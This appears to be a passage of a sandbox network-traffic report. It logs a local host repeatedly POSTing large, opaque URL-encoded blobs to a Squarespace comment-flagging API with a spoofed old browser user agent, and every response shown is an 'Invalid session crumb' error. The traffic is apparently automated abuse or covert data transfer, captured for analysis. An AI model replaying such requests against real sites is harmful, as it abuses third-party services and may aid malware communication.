2024-09-01 19:57:03 UTC	16306	OUT	Data Raw: 4b 4b 68 62 49 4e 30 51 42 42 34 43 63 30 67 4a 50 69 46 6a 44 67 36 2f 45 62 66 36 37 37 4a 47 32 63 79 4c 38 25 32 42 43 4f 7a 31 49 66 75 35 62 61 50 35 76 65 6d 36 65 67 6e 67 75 45 70 38 30 47 64 51 36 32 4f 58 37 53 6d 35 38 73 5a 4e 4c 71 2f 68 57 52 30 7a 54 34 74 68 63 35 41 6b 67 54 51 5a 4a 4e 49 67 41 6c 25 32 42 5a 4f 6f 68 65 51 42 67 6a 30 69 68 71 6d 6c 39 49 55 49 35 72 7a 67 74 4b 59 69 70 6c 78 32 48 52 63 75 41 70 66 77 4c 4d 75 31 57 53 6f 4a 45 45 34 43 43 75 41 46 45 79 6e 5a 76 4b 32 48 74 36 58 62 6a 69 58 39 6a 77 58 78 77 57 75 4a 6e 79 47 25 32 42 4a 4a 45 57 59 49 71 79 67 6c 32 48 49 77 78 56 32 63 32 36 53 53 4f 6b 72 79 54 58 32 64 36 79 59 51 7a 48 32 30 77 48 76 77 68 41 42 35 33 53 6d 33 67 4c 52 33 42 25 32 42 77 75 49 Data Ascii: KKhbIN0QBB4Cc0gJPiFjDg6/Ebf677JG2cyL8%2BCOz1Ifu5baP5vem6egnguEp80GdQ62OX7Sm58sZNLq/hWR0zT4thc5AkgTQZJNIgAl%2BZOoheQBgj0ihqml9IUI5rzgtKYiplx2HRcuApfwLMu1WSoJEE4CCuAFEynZvK2Ht6XbjiX9jwXxwWuJnyG%2BJJEWYIqygl2HIwxV2c26SSOkryTX2d6yYQzH20wHvwhAB53Sm3gLR3B%2BwuI
2024-09-01 19:57:03 UTC	1	OUT	Data Raw: 73 Data Ascii: s
2024-09-01 19:57:03 UTC	16306	OUT	Data Raw: 6f 49 52 49 50 44 71 42 75 30 5a 57 58 39 65 72 42 39 45 4b 52 37 42 5a 30 72 72 46 6e 58 43 52 66 61 4f 4f 79 34 31 69 4a 37 38 4b 6a 77 72 75 4b 36 45 52 58 45 46 6b 4e 67 6d 34 30 54 4d 6f 77 34 79 34 56 79 71 68 6a 4a 35 4d 66 36 58 50 38 42 79 6e 30 74 35 72 56 4f 49 4d 46 67 65 59 56 41 4b 67 33 62 68 67 75 64 72 53 36 55 72 36 74 6f 31 47 44 76 39 71 49 4e 6b 2f 48 4a 75 6b 58 68 33 6d 41 67 69 50 68 61 46 46 47 34 61 39 48 42 5a 31 34 7a 63 77 67 61 48 4b 62 25 32 42 6e 70 58 57 49 30 34 38 6f 4b 51 45 43 61 66 48 62 42 52 39 57 34 31 6a 53 43 35 4c 69 79 6c 44 52 4d 64 74 70 65 4d 4a 6e 43 53 49 4d 43 75 64 42 38 4d 74 55 57 37 79 68 45 72 64 59 4a 53 4c 4f 70 6d 31 62 71 66 73 25 32 42 2f 54 5a 30 49 78 44 62 4a 76 43 36 37 56 52 6a 39 64 67 7a Data Ascii: oIRIPDqBu0ZWX9erB9EKR7BZ0rrFnXCRfaOOy41iJ78KjwruK6ERXEFkNgm40TMow4y4VyqhjJ5Mf6XP8Byn0t5rVOIMFgeYVAKg3bhgudrS6Ur6to1GDv9qINk/HJukXh3mAgiPhaFFG4a9HBZ14zcwgaHKb%2BnpXWI048oKQECafHbBR9W41jSC5LiylDRMdtpeMJnCSIMCudB8MtUW7yhErdYJSLOpm1bqfs%2B/TZ0IxDbJvC67VRj9dgz
2024-09-01 19:57:03 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 19:57:03 UTC	16306	OUT	Data Raw: 59 43 35 71 48 74 2f 6b 38 54 44 31 41 69 38 71 4b 6d 61 4a 43 55 63 6b 30 45 52 57 75 53 62 44 6a 58 45 48 56 68 4b 78 34 42 44 67 38 32 50 47 2f 78 56 32 69 4d 65 46 44 62 59 65 32 34 51 56 49 58 30 51 50 4f 52 39 77 54 4c 33 78 6f 69 41 73 63 50 4d 34 63 6d 37 7a 66 4f 35 5a 66 51 51 4a 77 4e 49 59 78 73 52 4c 45 6f 42 51 48 49 45 68 6b 68 50 70 66 36 64 36 79 59 51 7a 48 32 30 77 45 42 79 42 49 5a 49 54 36 58 25 32 42 6a 71 48 6e 73 6f 50 64 7a 37 43 55 4b 53 6a 30 64 76 70 57 55 39 36 48 45 25 32 42 39 39 48 42 34 44 44 63 49 78 74 39 6f 6f 70 68 25 32 42 46 32 4e 69 4f 5a 50 79 6f 61 37 46 35 55 63 67 4a 46 41 49 32 64 55 25 32 42 49 77 36 6d 4f 32 55 74 48 4c 58 73 54 25 32 42 4f 41 38 64 45 56 68 32 53 38 2f 6c 6e 78 78 58 48 46 66 4e 51 77 6d 53 Data Ascii: YC5qHt/k8TD1Ai8qKmaJCUck0ERWuSbDjXEHVhKx4BDg82PG/xV2iMeFDbYe24QVIX0QPOR9wTL3xoiAscPM4cm7zfO5ZfQQJwNIYxsRLEoBQHIEhkhPpf6d6yYQzH20wEByBIZIT6X%2BjqHnsoPdz7CUKSj0dvpWU96HE%2B99HB4DDcIxt9ooph%2BF2NiOZPyoa7F5UcgJFAI2dU%2BIw6mO2UtHLXsT%2BOA8dEVh2S8/lnxxXHFfNQwmS
2024-09-01 19:57:03 UTC	1	OUT	Data Raw: 76 Data Ascii: v
2024-09-01 19:57:03 UTC	16306	OUT	Data Raw: 6d 4a 44 6f 48 52 76 4e 72 64 68 68 25 32 42 79 61 6c 6f 4c 25 32 42 31 46 64 59 33 43 41 39 65 69 76 7a 71 74 73 45 48 73 6a 25 32 42 4b 35 54 2f 48 32 34 61 51 4f 41 7a 25 32 42 51 63 51 59 56 48 52 70 62 61 68 6b 2f 51 58 74 6b 33 65 4e 67 63 44 62 6e 46 72 32 6f 77 54 4c 66 6a 50 56 4d 39 44 6e 75 4e 64 66 67 55 6c 33 54 35 58 48 59 74 30 52 4f 36 56 46 79 78 6b 75 50 78 7a 69 33 77 62 33 7a 64 37 71 37 7a 66 2f 49 66 71 68 33 71 4b 4d 49 63 4f 49 5a 6c 51 65 63 43 55 47 72 64 57 4e 51 6c 71 37 56 76 45 25 32 42 67 6f 70 68 38 37 2f 5a 70 6e 4b 7a 46 59 44 4f 67 61 55 72 44 46 74 46 31 74 68 58 54 56 2f 59 4b 36 78 54 25 32 42 57 5a 42 4c 6e 55 4d 61 57 77 47 36 4e 67 39 2f 55 52 25 32 42 70 5a 77 63 39 72 37 25 32 42 69 58 57 50 41 75 31 4f 38 63 56 Data Ascii: mJDoHRvNrdhh%2ByaloL%2B1FdY3CA9eivzqtsEHsj%2BK5T/H24aQOAz%2BQcQYVHRpbahk/QXtk3eNgcDbnFr2owTLfjPVM9DnuNdfgUl3T5XHYt0RO6VFyxkuPxzi3wb3zd7q7zf/Ifqh3qKMIcOIZlQecCUGrdWNQlq7VvE%2Bgoph87/ZpnKzFYDOgaUrDFtF1thXTV/YK6xT%2BWZBLnUMaWwG6Ng9/UR%2BpZwc9r7%2BiXWPAu1O8cV
2024-09-01 19:57:03 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:03 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQzjV4AWqS1PODkzOTg3NWRmNDI1OTkzMDYyNjM3ZjZiODlmZWNk; Path=/; Secure Set-Cookie: crumb=BVXewurGDEQ_NmQzOTA1ZTk4OWFhM2JlMjIxMTU5MzY5N2I0MGNk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: J9Wk07Rh/BB9yK9Ek Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVXewurGDEQ_NmQzOTA1ZTk4OWFhM2JlMjIxMTU5MzY5N2I0MGNk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49885	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:03 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:57:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:03 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:03 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 70 46 6d 66 71 61 69 48 54 72 55 66 4a 75 38 46 6f 76 55 4b 35 35 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjpFmfqaiHTrUfJu8FovUK55IwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:57:03 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:03 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXoaVoyXrAa3NTQxYmMzYThhYTk4NmVjZGVhMjk2NmVkMGNjZDMy; Path=/; Secure Set-Cookie: crumb=BaEeJl6Ad_rZN2U1MDEyMjA1YjRhMzBlYzI5N2ViNjAwZTc1MWE4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: TTiqhLdr/vNsb8L5m Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BaEeJl6Ad_rZN2U1MDEyMjA1YjRhMzBlYzI5N2ViNjAwZTc1MWE4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	49886	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:04 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 116722 Expect: 100-continue
2024-09-01 19:57:04 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:04 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:04 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 35 67 50 53 45 54 6f 69 62 59 56 4d 48 56 39 6b 74 77 52 75 31 33 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0Zwosu5gPSEToibYVMHV9ktwRu13bbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:57:04 UTC	1	OUT	Data Raw: 61 Data Ascii: a
2024-09-01 19:57:04 UTC	16306	OUT	Data Raw: 4b 4b 68 62 49 4e 30 51 42 42 34 43 63 30 67 4a 50 69 46 6a 44 67 36 2f 45 62 66 36 37 37 4a 47 32 63 79 4c 38 25 32 42 43 4f 7a 31 49 66 75 35 62 61 50 35 76 65 6d 36 65 67 6e 67 75 45 70 38 30 47 64 51 36 32 4f 58 37 53 6d 35 38 73 5a 4e 4c 71 2f 68 57 52 30 7a 54 34 74 68 63 35 41 6b 67 54 51 5a 4a 4e 49 67 41 6c 25 32 42 5a 4f 6f 68 65 51 42 67 6a 30 69 68 71 6d 6c 39 49 55 49 35 72 7a 67 74 4b 59 69 70 6c 78 32 48 52 63 75 41 70 66 77 4c 4d 75 31 57 53 6f 4a 45 45 34 43 43 75 41 46 45 79 6e 5a 76 4b 32 48 74 36 58 62 6a 69 58 39 6a 77 58 78 77 57 75 4a 6e 79 47 25 32 42 4a 4a 45 57 59 49 71 79 67 6c 32 48 49 77 78 56 32 63 32 36 53 53 4f 6b 72 79 54 58 32 64 36 79 59 51 7a 48 32 30 77 48 76 77 68 41 42 35 33 53 6d 33 67 4c 52 33 42 25 32 42 77 75 49 Data Ascii: KKhbIN0QBB4Cc0gJPiFjDg6/Ebf677JG2cyL8%2BCOz1Ifu5baP5vem6egnguEp80GdQ62OX7Sm58sZNLq/hWR0zT4thc5AkgTQZJNIgAl%2BZOoheQBgj0ihqml9IUI5rzgtKYiplx2HRcuApfwLMu1WSoJEE4CCuAFEynZvK2Ht6XbjiX9jwXxwWuJnyG%2BJJEWYIqygl2HIwxV2c26SSOkryTX2d6yYQzH20wHvwhAB53Sm3gLR3B%2BwuI
2024-09-01 19:57:04 UTC	1	OUT	Data Raw: 73 Data Ascii: s
2024-09-01 19:57:04 UTC	16306	OUT	Data Raw: 6f 49 52 49 50 44 71 42 75 30 5a 57 58 39 65 72 42 39 45 4b 52 37 42 5a 30 72 72 46 6e 58 43 52 66 61 4f 4f 79 34 31 69 4a 37 38 4b 6a 77 72 75 4b 36 45 52 58 45 46 6b 4e 67 6d 34 30 54 4d 6f 77 34 79 34 56 79 71 68 6a 4a 35 4d 66 36 58 50 38 42 79 6e 30 74 35 72 56 4f 49 4d 46 67 65 59 56 41 4b 67 33 62 68 67 75 64 72 53 36 55 72 36 74 6f 31 47 44 76 39 71 49 4e 6b 2f 48 4a 75 6b 58 68 33 6d 41 67 69 50 68 61 46 46 47 34 61 39 48 42 5a 31 34 7a 63 77 67 61 48 4b 62 25 32 42 6e 70 58 57 49 30 34 38 6f 4b 51 45 43 61 66 48 62 42 52 39 57 34 31 6a 53 43 35 4c 69 79 6c 44 52 4d 64 74 70 65 4d 4a 6e 43 53 49 4d 43 75 64 42 38 4d 74 55 57 37 79 68 45 72 64 59 4a 53 4c 4f 70 6d 31 62 71 66 73 25 32 42 2f 54 5a 30 49 78 44 62 4a 76 43 36 37 56 52 6a 39 64 67 7a Data Ascii: oIRIPDqBu0ZWX9erB9EKR7BZ0rrFnXCRfaOOy41iJ78KjwruK6ERXEFkNgm40TMow4y4VyqhjJ5Mf6XP8Byn0t5rVOIMFgeYVAKg3bhgudrS6Ur6to1GDv9qINk/HJukXh3mAgiPhaFFG4a9HBZ14zcwgaHKb%2BnpXWI048oKQECafHbBR9W41jSC5LiylDRMdtpeMJnCSIMCudB8MtUW7yhErdYJSLOpm1bqfs%2B/TZ0IxDbJvC67VRj9dgz
2024-09-01 19:57:04 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 19:57:04 UTC	16306	OUT	Data Raw: 59 43 35 71 48 74 2f 6b 38 54 44 31 41 69 38 71 4b 6d 61 4a 43 55 63 6b 30 45 52 57 75 53 62 44 6a 58 45 48 56 68 4b 78 34 42 44 67 38 32 50 47 2f 78 56 32 69 4d 65 46 44 62 59 65 32 34 51 56 49 58 30 51 50 4f 52 39 77 54 4c 33 78 6f 69 41 73 63 50 4d 34 63 6d 37 7a 66 4f 35 5a 66 51 51 4a 77 4e 49 59 78 73 52 4c 45 6f 42 51 48 49 45 68 6b 68 50 70 66 36 64 36 79 59 51 7a 48 32 30 77 45 42 79 42 49 5a 49 54 36 58 25 32 42 6a 71 48 6e 73 6f 50 64 7a 37 43 55 4b 53 6a 30 64 76 70 57 55 39 36 48 45 25 32 42 39 39 48 42 34 44 44 63 49 78 74 39 6f 6f 70 68 25 32 42 46 32 4e 69 4f 5a 50 79 6f 61 37 46 35 55 63 67 4a 46 41 49 32 64 55 25 32 42 49 77 36 6d 4f 32 55 74 48 4c 58 73 54 25 32 42 4f 41 38 64 45 56 68 32 53 38 2f 6c 6e 78 78 58 48 46 66 4e 51 77 6d 53 Data Ascii: YC5qHt/k8TD1Ai8qKmaJCUck0ERWuSbDjXEHVhKx4BDg82PG/xV2iMeFDbYe24QVIX0QPOR9wTL3xoiAscPM4cm7zfO5ZfQQJwNIYxsRLEoBQHIEhkhPpf6d6yYQzH20wEByBIZIT6X%2BjqHnsoPdz7CUKSj0dvpWU96HE%2B99HB4DDcIxt9ooph%2BF2NiOZPyoa7F5UcgJFAI2dU%2BIw6mO2UtHLXsT%2BOA8dEVh2S8/lnxxXHFfNQwmS
2024-09-01 19:57:04 UTC	1	OUT	Data Raw: 76 Data Ascii: v
2024-09-01 19:57:04 UTC	16306	OUT	Data Raw: 6d 4a 44 6f 48 52 76 4e 72 64 68 68 25 32 42 79 61 6c 6f 4c 25 32 42 31 46 64 59 33 43 41 39 65 69 76 7a 71 74 73 45 48 73 6a 25 32 42 4b 35 54 2f 48 32 34 61 51 4f 41 7a 25 32 42 51 63 51 59 56 48 52 70 62 61 68 6b 2f 51 58 74 6b 33 65 4e 67 63 44 62 6e 46 72 32 6f 77 54 4c 66 6a 50 56 4d 39 44 6e 75 4e 64 66 67 55 6c 33 54 35 58 48 59 74 30 52 4f 36 56 46 79 78 6b 75 50 78 7a 69 33 77 62 33 7a 64 37 71 37 7a 66 2f 49 66 71 68 33 71 4b 4d 49 63 4f 49 5a 6c 51 65 63 43 55 47 72 64 57 4e 51 6c 71 37 56 76 45 25 32 42 67 6f 70 68 38 37 2f 5a 70 6e 4b 7a 46 59 44 4f 67 61 55 72 44 46 74 46 31 74 68 58 54 56 2f 59 4b 36 78 54 25 32 42 57 5a 42 4c 6e 55 4d 61 57 77 47 36 4e 67 39 2f 55 52 25 32 42 70 5a 77 63 39 72 37 25 32 42 69 58 57 50 41 75 31 4f 38 63 56 Data Ascii: mJDoHRvNrdhh%2ByaloL%2B1FdY3CA9eivzqtsEHsj%2BK5T/H24aQOAz%2BQcQYVHRpbahk/QXtk3eNgcDbnFr2owTLfjPVM9DnuNdfgUl3T5XHYt0RO6VFyxkuPxzi3wb3zd7q7zf/Ifqh3qKMIcOIZlQecCUGrdWNQlq7VvE%2Bgoph87/ZpnKzFYDOgaUrDFtF1thXTV/YK6xT%2BWZBLnUMaWwG6Ng9/UR%2BpZwc9r7%2BiXWPAu1O8cV
2024-09-01 19:57:04 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:04 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZIesvdHT3kAMTkxYTdiODI1ZmNmYmQxYzNmNTZlYzdkYmU0NjNi; Path=/; Secure Set-Cookie: crumb=BeZKDZBCofr5NzJhNzU0ZDNjNzAxMTU3MDhkNmRkYWI2YTlmYjg3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: PVkll2Wx/uCpzoW3P Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeZKDZBCofr5NzJhNzU0ZDNjNzAxMTU3MDhkNmRkYWI2YTlmYjg3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	49887	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:04 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 116736 Expect: 100-continue
2024-09-01 19:57:04 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:04 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:04 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 35 67 50 53 45 54 6f 69 62 59 55 25 32 42 6f 58 34 67 34 4a 2f 4c 46 33 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0Zwosu5gPSEToibYU%2BoX4g4J/LF3bbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQw
2024-09-01 19:57:04 UTC	1	OUT	Data Raw: 75 Data Ascii: u
2024-09-01 19:57:04 UTC	16306	OUT	Data Raw: 37 61 4b 4b 68 62 49 4e 30 51 42 42 34 43 63 30 67 4a 50 69 46 6a 44 67 36 2f 45 62 66 36 37 37 4a 47 32 63 79 4c 38 25 32 42 43 4f 7a 31 49 66 75 35 62 61 50 35 76 65 6d 36 65 67 6e 67 75 45 70 38 30 47 64 51 36 32 4f 58 37 53 6d 35 38 73 5a 4e 4c 71 2f 68 57 52 30 7a 54 34 74 68 63 35 41 6b 67 54 51 5a 4a 4e 49 67 41 6c 25 32 42 5a 4f 6f 68 65 51 42 67 6a 30 69 68 71 6d 6c 39 49 55 49 35 72 7a 67 74 4b 59 69 70 6c 78 32 48 52 63 75 41 70 66 77 4c 4d 75 31 57 53 6f 4a 45 45 34 43 43 75 41 46 45 79 6e 5a 76 4b 32 48 74 36 58 62 6a 69 58 39 6a 77 58 78 77 57 75 4a 6e 79 47 25 32 42 4a 4a 45 57 59 49 71 79 67 6c 32 48 49 77 78 56 32 63 32 36 53 53 4f 6b 72 79 54 58 32 64 36 79 59 51 7a 48 32 30 77 48 76 77 68 41 42 35 33 53 6d 33 67 4c 52 33 42 25 32 42 77 Data Ascii: 7aKKhbIN0QBB4Cc0gJPiFjDg6/Ebf677JG2cyL8%2BCOz1Ifu5baP5vem6egnguEp80GdQ62OX7Sm58sZNLq/hWR0zT4thc5AkgTQZJNIgAl%2BZOoheQBgj0ihqml9IUI5rzgtKYiplx2HRcuApfwLMu1WSoJEE4CCuAFEynZvK2Ht6XbjiX9jwXxwWuJnyG%2BJJEWYIqygl2HIwxV2c26SSOkryTX2d6yYQzH20wHvwhAB53Sm3gLR3B%2Bw
2024-09-01 19:57:04 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:04 UTC	16306	OUT	Data Raw: 6e 73 6f 49 52 49 50 44 71 42 75 30 5a 57 58 39 65 72 42 39 45 4b 52 37 42 5a 30 72 72 46 6e 58 43 52 66 61 4f 4f 79 34 31 69 4a 37 38 4b 6a 77 72 75 4b 36 45 52 58 45 46 6b 4e 67 6d 34 30 54 4d 6f 77 34 79 34 56 79 71 68 6a 4a 35 4d 66 36 58 50 38 42 79 6e 30 74 35 72 56 4f 49 4d 46 67 65 59 56 41 4b 67 33 62 68 67 75 64 72 53 36 55 72 36 74 6f 31 47 44 76 39 71 49 4e 6b 2f 48 4a 75 6b 58 68 33 6d 41 67 69 50 68 61 46 46 47 34 61 39 48 42 5a 31 34 7a 63 77 67 61 48 4b 62 25 32 42 6e 70 58 57 49 30 34 38 6f 4b 51 45 43 61 66 48 62 42 52 39 57 34 31 6a 53 43 35 4c 69 79 6c 44 52 4d 64 74 70 65 4d 4a 6e 43 53 49 4d 43 75 64 42 38 4d 74 55 57 37 79 68 45 72 64 59 4a 53 4c 4f 70 6d 31 62 71 66 73 25 32 42 2f 54 5a 30 49 78 44 62 4a 76 43 36 37 56 52 6a 39 64 Data Ascii: nsoIRIPDqBu0ZWX9erB9EKR7BZ0rrFnXCRfaOOy41iJ78KjwruK6ERXEFkNgm40TMow4y4VyqhjJ5Mf6XP8Byn0t5rVOIMFgeYVAKg3bhgudrS6Ur6to1GDv9qINk/HJukXh3mAgiPhaFFG4a9HBZ14zcwgaHKb%2BnpXWI048oKQECafHbBR9W41jSC5LiylDRMdtpeMJnCSIMCudB8MtUW7yhErdYJSLOpm1bqfs%2B/TZ0IxDbJvC67VRj9d
2024-09-01 19:57:04 UTC	1	OUT	Data Raw: 69 Data Ascii: i
2024-09-01 19:57:04 UTC	16306	OUT	Data Raw: 39 36 59 43 35 71 48 74 2f 6b 38 54 44 31 41 69 38 71 4b 6d 61 4a 43 55 63 6b 30 45 52 57 75 53 62 44 6a 58 45 48 56 68 4b 78 34 42 44 67 38 32 50 47 2f 78 56 32 69 4d 65 46 44 62 59 65 32 34 51 56 49 58 30 51 50 4f 52 39 77 54 4c 33 78 6f 69 41 73 63 50 4d 34 63 6d 37 7a 66 4f 35 5a 66 51 51 4a 77 4e 49 59 78 73 52 4c 45 6f 42 51 48 49 45 68 6b 68 50 70 66 36 64 36 79 59 51 7a 48 32 30 77 45 42 79 42 49 5a 49 54 36 58 25 32 42 6a 71 48 6e 73 6f 50 64 7a 37 43 55 4b 53 6a 30 64 76 70 57 55 39 36 48 45 25 32 42 39 39 48 42 34 44 44 63 49 78 74 39 6f 6f 70 68 25 32 42 46 32 4e 69 4f 5a 50 79 6f 61 37 46 35 55 63 67 4a 46 41 49 32 64 55 25 32 42 49 77 36 6d 4f 32 55 74 48 4c 58 73 54 25 32 42 4f 41 38 64 45 56 68 32 53 38 2f 6c 6e 78 78 58 48 46 66 4e 51 77 Data Ascii: 96YC5qHt/k8TD1Ai8qKmaJCUck0ERWuSbDjXEHVhKx4BDg82PG/xV2iMeFDbYe24QVIX0QPOR9wTL3xoiAscPM4cm7zfO5ZfQQJwNIYxsRLEoBQHIEhkhPpf6d6yYQzH20wEByBIZIT6X%2BjqHnsoPdz7CUKSj0dvpWU96HE%2B99HB4DDcIxt9ooph%2BF2NiOZPyoa7F5UcgJFAI2dU%2BIw6mO2UtHLXsT%2BOA8dEVh2S8/lnxxXHFfNQw
2024-09-01 19:57:04 UTC	1	OUT	Data Raw: 65 Data Ascii: e
